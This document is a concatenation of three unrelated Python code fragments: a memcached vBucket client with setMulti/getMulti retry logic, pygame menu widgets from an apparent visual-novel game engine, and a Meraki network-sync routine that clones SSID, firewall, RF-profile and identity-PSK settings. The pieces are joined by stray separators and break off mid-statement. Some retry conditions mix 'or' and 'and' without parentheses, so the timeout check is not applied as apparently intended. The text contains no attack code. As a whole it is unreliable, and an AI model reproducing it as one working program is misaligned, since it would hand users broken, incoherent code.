self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str , keyval in server_keyval.items():
#if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec)
else:
mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq)
if errors:
self.log.error(list(set(str(error) for error in errors)),
exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str , keyval in server_keyval.items() :
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec, self._setMulti_parallel))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("Exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)),
exc_info=1)
raise errors[0]
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn):
try:
errors = memcached_client.setMulti(exp, flags, keyval)
if not errors:
return []
elif timeout <= 0:
return errors
else:
# Sleep before calling
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause) # Start all over again for these key vals.
return [] # Note: If used for async,too many recursive threads could get spawn here.
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in error.strerror \
or "Timeout waiting for socket" in error.strerror \
or "Broken pipe" in error.strerror \
or "Connection reset by peer" in error.strerror \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except AttributeError:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keyval.keys()))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in key_val_dic.items():
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval :
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
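    # Illustrative sketch (hypothetical keys and node addresses) of the grouping
    # done by _get_server_keyval_dic: a flat key/value dict becomes one dict per
    # owning server, e.g.
    #   {"k1": "v1", "k2": "v2"} -> {"10.0.0.1:11210": {"k1": "v1"},
    #                                "10.0.0.2:11210": {"k2": "v2"}}
    # assuming _get_vBucket_id("k1") and _get_vBucket_id("k2") resolve to vBuckets
    # that self.vBucketMap places on different nodes.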
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True):
if parallel:
return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec)
else:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5):
server_keys = self._get_server_keys_dic(keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str , keys in server_keys.items() : # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(keys_vals.keys())))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in server_keys.items():
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._getMulti_from_mc , mc, keys, pause_sec, timeout_sec, self._getMulti_parallel))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(keys_vals.keys())))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn):
try:
return memcached_client.getMulti(keys)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and timeout > 0:
# Wait before reset_vbs call
sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise | |
not getattr(self.textbox,"kill",0) and self.textbox.can_continue()
class menu(fadesprite,gui.widget):
z = 5
fail = "none"
id_name = "invest_menu"
def over(self,mp):
oy = self.getpos()[1]
for o in self.options:
p2 = self.opos[o]
w,h = self.opt.get_width()//2,self.opt.get_height()//2
if mp[0]>=p2[0] and mp[0]<=p2[0]+w and mp[1]>=p2[1]+oy and mp[1]<=p2[1]+h+oy:
return o
def move_over(self,pos,rel,buttons):
if buttons[0]:
self.click_down_over(pos)
def click_down_over(self,mp):
gui.window.focused = self
o = self.over(mp)
if o is not None:
self.selected = o
def click_up(self,mp):
o = self.over(mp)
if self.selected==o and o is not None:
self.enter_down()
def __init__(self):
self.bg = None
oy = 192
fadesprite.__init__(self,x=0,y=oy)
gui.widget.__init__(self,[0,oy],[assets.sw,assets.sh])
self.load("general/black")
self.max_fade = int(float(assets.variables.get("_menu_fade_level",50)))
self.fade = 0
if self.max_fade == 0:
self.setfade(0)
else:
assets.cur_script.obs.append(fadeanim(start=0,end=self.max_fade,speed=3,wait=1,name=None,obs=[self]))
self.options = []
self.selected = ""
self.opt = assets.open_art("general/talkbuttons",key=[255,0,255])[0]
stx,sty = (assets.sw-self.opt.get_width())/2,(assets.sh-self.opt.get_height())/2
self.opos_c = {"examine":[0,0],"move":[1,0],
"talk":[0,1],"present":[1,1]}
self.opos_l = [["examine","move"],["talk","present"]]
self.opos = {"examine":[stx,sty],"move":[stx+self.opt.get_width()/2,sty],
"talk":[stx,sty+self.opt.get_height()/2],"present":[stx+self.opt.get_width()/2,sty+self.opt.get_height()/2]}
imgs = []
x=y=0
while y<self.opt.get_height():
while x<self.opt.get_width():
imgs.append(self.opt.subsurface([[x,y],[self.opt.get_width()//2,self.opt.get_height()//2]]))
x+=self.opt.get_width()//2
y+=self.opt.get_height()//2+1
x = 0
self.oimgs = {"examine":imgs[0],"move":imgs[1],"talk":imgs[2],"present":imgs[3]}
self.opthigh = assets.open_art("general/talkbuttons_high",key=[255,0,255])[0]
imgs = []
x=y=0
while y<self.opthigh.get_height():
while x<self.opthigh.get_width():
imgs.append(self.opthigh.subsurface([[x,y],[self.opthigh.get_width()//2,self.opthigh.get_height()//2]]))
x+=self.opthigh.get_width()//2
y+=self.opthigh.get_height()//2+1
x = 0
self.oimgshigh = {"examine":imgs[0],"move":imgs[1],"talk":imgs[2],"present":imgs[3]}
self.open_script = True
self.primary = True
def init_normal(self):
subscript("show_court_record_button")
def delete(self):
super(menu,self).delete()
subscript("hide_court_record_button")
def update(self):
if not self.options:
self.delete()
fadesprite.update(self)
self.screen_setting = "try_bottom"
return True
def get_coord(self):
try:
return self.opos_c[self.selected][:]
except:
return [0,0]
def k_right(self):
coord = self.get_coord()
coord[0]+=1
if coord[0]>1:
coord[0] = 0
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_left(self):
coord = self.get_coord()
coord[0]-=1
if coord[0]<0:
coord[0] = 1
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_up(self):
coord = self.get_coord()
coord[1]-=1
if coord[1]<0:
coord[1] = 1
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def k_down(self):
coord = self.get_coord()
coord[1]+=1
if coord[1]>1:
coord[1] = 0
sel = self.opos_l[coord[1]][coord[0]]
if sel in self.options:
self.selected = sel
subscript("sound_investigate_menu_select")
def enter_down(self):
if self.open_script:
print "INITIALIZE MENU SCENE"
assets.cur_script.init(self.scene+"."+self.selected)
else:
print "TRY TO JUMP TO LABEL"
assets.cur_script.goto_result(self.selected,backup=self.fail)
self.delete()
subscript("sound_investigate_menu_confirm")
def addm(self,opt):
if opt:
self.options.append(opt)
if not self.selected:
self.selected = opt
def delm(self,opt):
if opt in self.options:
self.options.remove(opt)
if self.selected == opt:
self.selected = None
def draw(self,dest):
if not self.bg:
for o in reversed(assets.cur_script.obs):
if isinstance(o,bg):
self.bg = o.img.copy()
break
self.screen_setting = "try_bottom"
if self.bg:
dest.blit(self.bg,self.getpos())
if not hasattr(self,"fade") or self.fade>=self.max_fade:
for o in self.options:
if self.selected == o:
dest.blit(self.oimgshigh[o],[self.opos[o][0],self.opos[o][1]+self.getpos()[1]])
else:
dest.blit(self.oimgs[o],[self.opos[o][0],self.opos[o][1]+self.getpos()[1]])
class listmenu(fadesprite,gui.widget):
fail = "none"
id_name = "list_menu_id"
def over(self,mp):
if getattr(self,"kill",0):
return False
x = (assets.sw-self.choice.img.get_width())/2
y = self.getpos()[1]+30
si = None
i = 0
for c in self.options:
if mp[0]>=x and mp[1]>=y and mp[0]<=x+self.choice.width and mp[1]<=y+self.choice.height:
si = i
i+=1
y+=self.choice.img.get_height()+5
return si
def move_over(self,pos,rel,buttons):
if getattr(self,"kill",0):
return False
if buttons[0]:
self.click_down_over(pos)
def click_down_over(self,mp):
if getattr(self,"kill",0):
return False
gui.window.focused = self
si = self.over(mp)
if si is not None:
self.si = si
self.selected = self.options[self.si]
def click_up(self,mp):
if getattr(self,"kill",0):
return False
si = self.over(mp)
if self.si==si and si is not None:
self.enter_down()
def __init__(self,tag=None):
self.pri = ulayers.index(self.__class__.__name__)
x,y = 0,192
gui.widget.__init__(self,[x,y],[assets.sw,assets.sh])
fadesprite.__init__(self,x=x,y=y)
self.load(assets.variables.get("_list_bg_image","general/black"))
self.max_fade = int(float(assets.variables.get("_menu_fade_level",50)))
self.fade = 0
if assets.num_screens == 2 and not vtrue(assets.variables.get("_double_screen_list_fade","false")):
self.setfade(255)
elif self.max_fade == 0:
self.setfade(0)
else:
assets.cur_script.obs.append(fadeanim(start=0,end=self.max_fade,speed=3,wait=1,name=None,obs=[self]))
self.options = []
self.si = 0
self.selected = ""
self.choice = fadesprite().load("general/talkchoice")
self.choice_high = fadesprite().load("general/talkchoice_high")
self.hidden = True
self.tag = tag
self.primary = True
def init_normal(self):
subscript("show_court_record_button")
def delete(self):
subscript("hide_court_record_button")
self.kill = 1
if hasattr(self,"bck"):
self.bck.kill = 1
def update(self):
fadesprite.update(self)
self.screen_setting = "try_bottom"
if self.hidden:
return False
if not hasattr(self,"bck") and vtrue(assets.variables.get("_list_back_button","true")) and not getattr(self,"noback",False):
self.bck = guiBack()
self.bck.pri = 1000
def k_space(b=self.bck):
self.delete()
subscript("sound_list_menu_cancel")
print "kill back button and self"
assets.variables["_selected"] = "Back"
self.bck.k_space = k_space
assets.cur_script.obs.append(self.bck)
if not self.options:
self.k_space()
return True
def k_up(self):
if getattr(self,"kill",0):
return False
self.si -= 1
if self.si<0:
self.si = len(self.options)-1
self.selected = self.options[self.si]
self.change_selected()
subscript("sound_list_menu_select")
def k_down(self):
if getattr(self,"kill",0):
return False
self.si += 1
if self.si>=len(self.options):
self.si = 0
self.selected = self.options[self.si]
self.change_selected()
subscript("sound_list_menu_select")
def enter_down(self):
if getattr(self,"kill",0):
return False
if not self.selected:
return
subscript("sound_list_menu_confirm")
if self.tag:
assets.lists[self.tag][self.selected["label"]] = 1
if self.selected["result"] != "Back":
assets.variables["_selected"] = self.selected["result"]
assets.cur_script.goto_result(self.selected["result"],backup=self.fail)
else:
assets.variables["_selected"] = "Back"
self.delete()
def change_selected(self):
scr = self.options[self.si].get("on_select",None)
if scr:
assets.cur_script.execute_macro(scr)
#subscript(scr)
def draw(self,dest):
if getattr(self,"kill",0):
return False
if not self.selected and self.options:
self.selected = self.options[self.si]
self.change_selected()
fadesprite.draw(self,dest)
x = (assets.sw-self.choice.img.get_width())/2
y = self.getpos()[1]+30
#self.choice.setfade(200)
#self.choice_high.setfade(200)
for c in self.options:
if 0:#self.selected == c:
img = self.choice_high.img.copy()
else:
img = self.choice.img.copy()
rt = c["label"]
checkmark = assets.variables.get("_list_checked_img","general/checkmark")
if "checkmark" in c:
checkmark = c["checkmark"]
try:
checkmark = sprite().load(checkmark)
except:
checkmark = None
if (not (checkmark and checkmark.width)) and self.tag and assets.lists[self.tag].get(rt,None):
rt = "("+rt+")"
txt = assets.get_image_font("list").render(rt,[110,20,20])
img.blit(txt,[(img.get_width()-txt.get_width())/2,
(img.get_height()-txt.get_height())/2])
dest.blit(img,[x,y])
if self.selected == c:
lwi = 2
color = color_str(assets.variables.get("_list_outline_color","ffaa45"))
pygame.draw.line(dest,color,[x-1,y+8],[x-1,y+1],lwi)
pygame.draw.line(dest,color,[x+1,y-2],[x+8,y-2],lwi)
pygame.draw.line(dest,color,[x+img.get_width(),y+8],[x+img.get_width(),y+1],lwi)
pygame.draw.line(dest,color,[x+img.get_width()-2,y-2],[x+img.get_width()-9,y-2],lwi)
pygame.draw.line(dest,color,[x+img.get_width(),y+img.get_height()-2],[x+img.get_width(),y+img.get_height()-9],lwi)
pygame.draw.line(dest,color,[x+img.get_width()-2,y+img.get_height()],[x+img.get_width()-9,y+img.get_height()],lwi)
pygame.draw.line(dest,color,[x-1,y+img.get_height()-2],[x-1,y+img.get_height()-9],lwi)
pygame.draw.line(dest,color,[x+1,y+img.get_height()],[x+8,y+img.get_height()],lwi)
if checkmark and checkmark.width and self.tag and assets.lists[self.tag].get(rt,None):
if "check_x" in c:
cx = int(c["check_x"])
else:
cx = int(assets.variables.get("_list_checked_x","-10"))
if "check_y" in c:
cy = int(c["check_y"])
else:
cy = int(assets.variables.get("_list_checked_y","-10"))
dest.blit(checkmark.base[0],[x+cx,y+cy])
y+=self.choice.img.get_height()+5
def k_space(self):
if getattr(self,"kill",0):
return False
if hasattr(self,"bck") or "Back" in self.options:
self.delete()
subscript("sound_list_menu_cancel")
class case_menu(fadesprite,gui.widget):
children = []
parent = None
def click_down_over(self,mp):
surf,pos = self.option_imgs[self.choice*3]
new,npos = self.option_imgs[self.choice*3+1]
save,spos = self.option_imgs[self.choice*3+2]
pos = pos[:]
pos[0]-=self.x
if mp[0]<pos[0]:
self.k_left()
elif mp[0]>pos[0]+surf.get_width():
self.k_right()
else:
if new and mp[1]>=npos[1] and mp[1]<=npos[1]+new.get_height():
self.enter_down()
elif save and mp[1]>=spos[1] and mp[1]<=spos[1]+save.get_height():
assets.game = self.path+"/"+self.options[self.choice]
assets.load_game_menu()
#assets.load_game(self.path+"/"+self.options[self.choice])
def get_script(self,fullpath):
dname = os.path.split(fullpath)[1]
for test in [[fullpath+"/intro.txt","intro"],[fullpath+"/"+dname+".txt",dname]]:
if os.path.exists(test[0]):
return test[1]
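    # Hedged example of the lookup above (paths are hypothetical): with
    # fullpath = "games/first_turnabout", get_script returns "intro" if
    # games/first_turnabout/intro.txt exists, otherwise "first_turnabout" if
    # games/first_turnabout/first_turnabout.txt exists, otherwise None.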
def __init__(self,path="games",**kwargs):
self.pri = kwargs.get("pri",ulayers.index(self.__class__.__name__))
self.reload=False
self.path = path
fadesprite.__init__(self,screen=2)
self.base = self.img = assets.Surface([64,64])
self.max_fade = 150
self.next = 0
self.width = assets.sw
self.height = assets.sh
self.options = []
order = assets.variables.get("_order_cases","alphabetical")
if order=="alphabetical":
for d in os.listdir(path):
full = os.path.join(path,d)
if os.path.isdir(full):
if self.get_script(full):
self.options.append(d)
self.options.sort()
elif order=="variable":
opts = {}
for v in assets.variables.keys():
if v.startswith("_case_"):
try:
num = int(v[6:])
opts[num] = assets.variables[v]
except:
continue
self.options = []
keys = opts.keys()
keys.sort()
for k in keys:
self.options.append(opts[k])
else:
raise script_error("_order_cases set to '%s',"%(order,)+\
"only valid values are 'alphabetical' or "+\
"'variable'")
self.init_options()
self.choice = 0
self.x = 0
try:
f = open(path+"/last")
self.choice = int(f.readlines()[0].strip())
f.close()
except:
pass
if self.choice>=len(self.options):
self.choice = 0
self.scrolling = False
self.arr = assets.open_art("general/arrow_right")[0]
self.tried_case = False
self.primary = True
def delete(self):
super(case_menu,self).delete()
def init_options(self):
self.option_imgs = []
base = assets.open_art("general/selection_chapter")[0].convert()
x = self.pos[0]+assets.sw/2-base.get_width()/2
y = self.pos[1]+assets.sh/2-base.get_height()/2
for o in self.options:
spr = base.copy()
title = o.replace("_"," ")
lines = [[]]
wd_sp = 2
for word in title.split(" "):
word = assets.get_font("gametitle").render(word,1,[200,100,100])
if sum([wd.get_width() for wd in lines[-1]])+wd_sp*len(lines[-1])+word.get_width()>160:
lines.append([])
lines[-1].append(word)
wd_y = spr.get_height()//2-(len(lines)*16)//2
for line in lines:
w = sum([wd.get_width() for wd in line])+wd_sp*len(line)
wd_x = (spr.get_width()-w)/2
for word in line:
spr.blit(word,[wd_x,wd_y])
wd_x += word.get_width()+wd_sp
wd_y += 16
self.option_imgs.append([spr,[x,y]])
fnt = assets.get_font("new_resume")
txt = fnt.render("New game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+60]])
if os.path.exists(self.path+"/"+o+"/save.ns"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
elif os.path.exists(self.path+"/"+o+"/save"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
elif os.path.exists(self.path+"/"+o+"/autosave.ns"):
txt = fnt.render("Resume Game",1,[200,100,100])
spr = pygame.transform.scale(base,[base.get_width(),base.get_height()//2])
spr.blit(txt,[(spr.get_width()-txt.get_width())/2,(spr.get_height()-txt.get_height())/2])
self.option_imgs.append([spr,[x,y+90]])
else:
self.option_imgs.append([None,None])
x+=assets.sw
self.children = self.option_imgs
def update(self):
if self.reload:
self.option_imgs = []
self.__init__(self.path)
spd = (self.choice*256-self.x)/25.0
if abs(spd)>0 and abs(spd)<10:
spd = 10*abs(spd)/spd
spd *= assets.dt
if self.x<self.choice*assets.sw:
self.x+=spd
if self.x>self.choice*assets.sw:
self.x=self.choice*assets.sw
if self.x>self.choice*assets.sw:
self.x+=spd
if self.x<self.choice*assets.sw:
self.x=self.choice*assets.sw
return True
def k_right(self):
if self.choice<len(self.options)-1:
self.choice += 1
subscript("sound_case_menu_select")
self.case_screen()
def k_left(self):
if self.choice>0:
self.choice -= 1
subscript("sound_case_menu_select")
self.case_screen()
def case_screen(self):
if not self.options:
return
if not hasattr(self,"curgame"):
self.curgame = assets.game
if os.path.exists(os.path.join(self.path,self.options[self.choice],"case_screen.txt")):
scr = assets.Script()
scr.parent = assets.cur_script
assets.stack.append(scr)
assets.game=self.curgame+"/"+self.options[self.choice]
assets.registry = registry.combine_registries("./"+assets.game,assets.show_load)
print "init: g:%s choice:%s"%(assets.game,self.options[self.choice])
assets.cur_script.init("case_screen")
assets.cur_script.world = scr.parent.world
def enter_down(self):
f = open(os.path.join(self.path,"last"),"w")
f.write(str(self.choice))
f.close()
assets.start_game(self.path+"/"+self.options[self.choice],mode="nomenu")
def draw(self,dest):
if self.reload:
return
if not self.tried_case:
self.case_screen()
self.tried_case = 1
for s,p in self.option_imgs:
if not s: continue
dest.blit(s,[p[0]-self.x,p[1]])
if self.x==self.choice*assets.sw:
if self.choice<len(self.options)-1:
dest.blit(self.arr,[self.pos[0]+240,self.pos[1]+80])
if self.choice>0:
dest.blit(pygame.transform.flip(self.arr,1,0),[self.pos[0],self.pos[1]+80])
class examine_menu(sprite,gui.widget):
fail = "none"
def move_over(self,pos,rel,buttons):
if self.xscrolling:
return
if gui.window.focused == self:
self.mx,self.my = [pos[0],pos[1]-self.getpos()[1]]
self.highlight()
def click_down_over(self,mp):
if self.xscrolling:
return
gui.window.focused = self
if self.hide or self.selected == ["none"] or mp[0]<175 or mp[1]<159+self.getpos()[1]:
self.move_over(mp,None,None)
def click_up(self,mp):
if self.xscrolling:
return
if gui.window.focused == self:
| |
= config['RAD_KEYS'][temp_SSID['name']].replace('"','').replace(' ','')
if "meraki123!" in secret:
print(f'\t\t{bc.FAIL}Using DEFAULT!!! Radius Secret [{bc.WARNING}{secret}{bc.FAIL}]')
#sys.exit(1)
if 'radiusServers' in temp_SSID:
#print(f'{bc.OKGREEN}Using Secret [{bc.WARNING}{secret}{bc.OKGREEN}]')
for rs in temp_SSID['radiusServers']:
rs['secret'] = secret
if 'radiusAccountingServers' in temp_SSID:
for ras in temp_SSID['radiusAccountingServers']:
ras['secret'] = secret
### END OF THE OVERRIDES/EXCEPTIONS
try:
#print(f'Writing {temp_SSID}')
if self.WRITE:
self.ssids[temp_SSID['number']] = self.db.wireless.updateNetworkWirelessSsid(self.net_id,**temp_SSID)
self.CLEAN = False
except:
print(f'Error writing SSID[{temp_SSID["name"]}]')
print(temp_SSID)
print("Unexpected error:", sys.exc_info())
raise
#Clone the L3 FW rules
if not self.compare(self.ssids_l3[i], master.ssids_l3[i]):
#print(f'L3 is not the same')
print(f'\t\t-{bc.OKBLUE} Copied L3 rules for SSID[{self.ssids[i]["name"]}] ')
lanAccess = True
l3rules = copy.deepcopy(master.ssids_l3[i])
newL3 = {}
newL3['rules'] = []
                for rule in list(l3rules['rules']):  # iterate over a copy, since the loop removes items from the original list
if rule['destCidr'] == "Local LAN":
if rule['policy'] == "deny": lanAccess = False
else: lanAccess = True
l3rules['rules'].remove(rule) #pull out the allow Lan Access rule, it's boolean
if rule['comment'] == "Default rule" or not rule['destCidr'] == "Local LAN":
newL3['rules'].append(rule) #pull out default rule, always the same
#print(f'L3 Rules are {newL3}')
newL3['allowLanAccess'] = lanAccess
if self.WRITE:
self.ssids_l3[i] = self.db.wireless.updateNetworkWirelessSsidFirewallL3FirewallRules(self.net_id,i, **newL3)
self.CLEAN = False
CLEAN_L3 = False
#Clone the L7 FW rules
if not self.compare(self.ssids_l7[i], master.ssids_l7[i]):
l7rules = copy.deepcopy(master.ssids_l7[i])
#print(f'L7 not the same ... cloning')
print(f'\t\t-{bc.OKBLUE} Copied L7 rules for SSID[{self.ssids[i]["name"]}] ')
if self.WRITE:
self.ssids_l7[i] = self.db.wireless.updateNetworkWirelessSsidFirewallL7FirewallRules(self.net_id,i, **l7rules)
self.CLEAN = False
CLEAN_L7 = False
#Clone the TS Rules
if not self.compare(self.ssids_ts[i], master.ssids_ts[i]):
print(f'\t\t-{bc.OKBLUE} Copied Traffic Shaping rules for SSID[{self.ssids[i]["name"]}] ')
try:
TSrules = copy.deepcopy(master.ssids_ts[i])
if self.WRITE:
self.ssids_ts[i] = self.db.wireless.updateNetworkWirelessSsidTrafficShapingRules(self.net_id, i, **TSrules)
self.CLEAN = False
CLEAN_TS = False
except:
print(f'\t\t-{bc.FAIL}Failed to update TrafficShaping. Make sure all rules are complete{bc.ENDC}')
#This might not be needed, so could increase sync time.
#if not self.CLEAN:
#self.u_getSSIDS() #this also updates ssids_range
#if self.hasAironetIE: self.u_getSSIDS_aie()
#if not CLEAN_L3: self.u_getSSIDS_l3()
#if not CLEAN_L7: self.u_getSSIDS_l7()
#if not CLEAN_TS: self.u_getSSIDS_ts()
#self.CLEAN = True
#if len(self.ssids_range) == len(master.ssids_range)
try:
for i in self.ssids_range: # and self.hasAironetIE:
if self.hasAironetIE and not self.compare(self.aironetie[i], master.aironetie[i]):
if self.WRITE:
self.CLEAN = False
self.setaironetie(self.net_id, i, master.aironetie[i])
print(f'{bc.OKBLUE}\t\tConfiguring AironetIE[{bc.WARNING}{master.aironetie[i]}{bc.OKBLUE}] on SSID[{bc.WARNING}{i}{bc.OKBLUE}]{bc.ENDC}')
except:
            print(f'Master ssids_range[{master.ssids_range}] ssid_aironetie[{master.aironetie}]')
            print(f'Self ssids_range[{self.ssids_range}] ssid_aironetie[{self.aironetie}]')
#sys.exit(1)
self.u_getSSIDS()
self.u_getSSIDS_aie()
if not self.CLEAN:
if self.hasAironetIE:
self.hasAironetIE = None
self.u_getSSIDS_aie()
self.CLEAN = True
#RFProfiles - (if it exists and not equal, delete/update. If it doesn't exist, create)
self_RFPS= copy.deepcopy(self.getNetworkWirelessRfProfiles)
master_RFPS = copy.deepcopy(master.getNetworkWirelessRfProfiles)
for srfp in self_RFPS:
srfp.pop('id')
srfp.pop('networkId')
for mrfp in master_RFPS:
mrfp.pop('id')
mrfp.pop('networkId')
if not self.compare(self_RFPS,master_RFPS): #Profiles are NOT the same
for masterRF in master.getNetworkWirelessRfProfiles:
found = False
for selfRF in self.getNetworkWirelessRfProfiles:
if masterRF['name'] == selfRF['name']:
#print(f'RF Profile[{masterRF["name"]}] FOUND')
found = True
if not self.soft_compare(masterRF, selfRF): #It's in there but might not be the same
print(f'\t{bc.OKBLUE}RF Profile[{bc.WARNING}{masterRF["name"]}{bc.OKBLUE}] !!! Updating RF Profile{bc.ENDC}')
newRF = copy.deepcopy(masterRF)
newRF.pop('id')
newRF.pop('networkId')
newRF.pop('name')
newRF = self.MR_rfp_pwr(newRF)
if self.WRITE:
self.db.wireless.updateNetworkWirelessRfProfile(self.net_id,selfRF['id'], **newRF)
self.CLEAN = False
#no more RFProfiles in self, create one
if not found:
print(f'\t{bc.OKBLUE}RF Profile[{bc.WARNING}{masterRF["name"]}{bc.OKBLUE}]!!! New RFP created in network{bc.ENDC}')
newRF = copy.deepcopy(masterRF)
newRF.pop('id')
newRF.pop('networkId')
newRF = self.MR_rfp_pwr(newRF)
if self.WRITE:
self.db.wireless.createNetworkWirelessRfProfile(self.net_id,**newRF)
self.CLEAN = False
#wouldn't be here without something being different, so at least resync this part
if not self.CLEAN:
self.u_getNetworkWirelessRfProfiles()
self.CLEAN = True
#SSIDS_iPSK
#for ssid_num in range(0,15):
ipsk_tmp = []
for r in range(0,15):
ipsk_tmp.append({})
for ssid_num in self.ssids_range:
#if not ssid_num in self.ssids_range: continue
#ipsk_tmp.append({}) #keep track of master iPSKs so we can remove unused ones from local(self)
for m_ipsk in master.ssids_ipsk[ssid_num]:
if not m_ipsk['name'] in ipsk_tmp[ssid_num]:
ipsk_tmp[ssid_num][m_ipsk['name']] = m_ipsk['passphrase']
#ipsks are not empty, find the matching group policy
new_ipsk = copy.deepcopy(m_ipsk)
new_ipsk.pop('id') #pop off the ID from master, new one will be created "local"
master_GP_tmp = master.find_fromGPID(master.getNetworkGroupPolicies, str(new_ipsk['groupPolicyId']))
local_GP_tmp = self.find_fromName(self.getNetworkGroupPolicies, str(master_GP_tmp['name']))
new_ipsk['groupPolicyId'] = local_GP_tmp['groupPolicyId']
exists = False
for s_ipsk in self.ssids_ipsk[ssid_num]:
if new_ipsk['name'] == s_ipsk['name']:
exists = True #exists, ignore unless passwords are different
if not new_ipsk['passphrase'] == s_ipsk['passphrase']: #if passwords are different, delete the ipsk and re-create
if self.WRITE:
self.CLEAN = False
try:
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
except:
print(f'ERROR: iPSK Issue, resyncing and trying again')
self.u_getSSIDS_ipsk()
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
exists = False
if not exists and self.WRITE:
self.CLEAN = False
try:
self.db.wireless.createNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, **new_ipsk)
except:
print(f'{bc.FAIL}iPSK already created or still there{bc.ENDC}')
if not self.CLEAN:
self.u_getSSIDS_ipsk()
self.CLEAN = True
#cleanUP local iPSK
for ssid_num in self.ssids_range:
for s_ipsk in self.ssids_ipsk[ssid_num]:
if not s_ipsk['name'] in ipsk_tmp[ssid_num]:
if self.WRITE:
self.CLEAN = False
print(f'\t\t{bc.OKBLUE}-Removing Legacy iPSK[{s_ipsk["name"]}]{bc.ENDC}')
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id, ssid_num, s_ipsk['id'])
### Clone Wireless Settings
if not self.compare(master.getNetworkWirelessSettings, self.getNetworkWirelessSettings):
if self.WRITE:
print(f'\t{bc.OKBLUE}-Updating Wireless Settings in network {bc.WARNING}{self.name}{bc.ENDC}')
self.CLEAN = False
